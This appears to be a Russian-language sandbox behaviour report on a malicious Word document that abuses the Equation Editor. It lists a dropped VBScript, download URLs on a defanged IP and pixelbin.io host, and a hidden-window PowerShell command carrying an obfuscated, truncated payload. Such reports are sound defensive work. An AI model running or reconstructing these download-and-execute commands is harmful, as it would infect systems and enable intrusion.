Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\system32.vbs"
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\system32.vbs
Сетевая активность
Подключается к
- '19#.#.216.144':80
- 'cd#.#ixelbin.io':443
TCP
Запросы HTTP GET
- http://19#.#.216.144/PPL/AWSSDSWEHJERDUFYDYUERJHFDFUHUSDF%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23FJDFJSDJF%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23DHFJHDFJSDFHJSDF.DOC
- http://19#.#.216.144/630/system32.vbs
Другие
- 'cd#.#ixelbin.io':443
UDP
- DNS ASK cd#.#ixelbin.io
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBm⁂Gw⁂YQB0⁂C0⁂dwBh⁂HY⁂ZQ⁂t⁂GY⁂Mw⁂3⁂D⁂⁂Ng⁂w⁂C8⁂bwBy⁂Gk⁂ZwBp⁂G4⁂YQBs⁂...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBm⁂Gw⁂YQB0⁂C0⁂dwBh⁂HY⁂ZQ⁂t⁂GY⁂Mw⁂3⁂D⁂⁂Ng⁂w⁂C8⁂bwBy⁂Gk⁂ZwBp⁂G4⁂YQBs⁂...
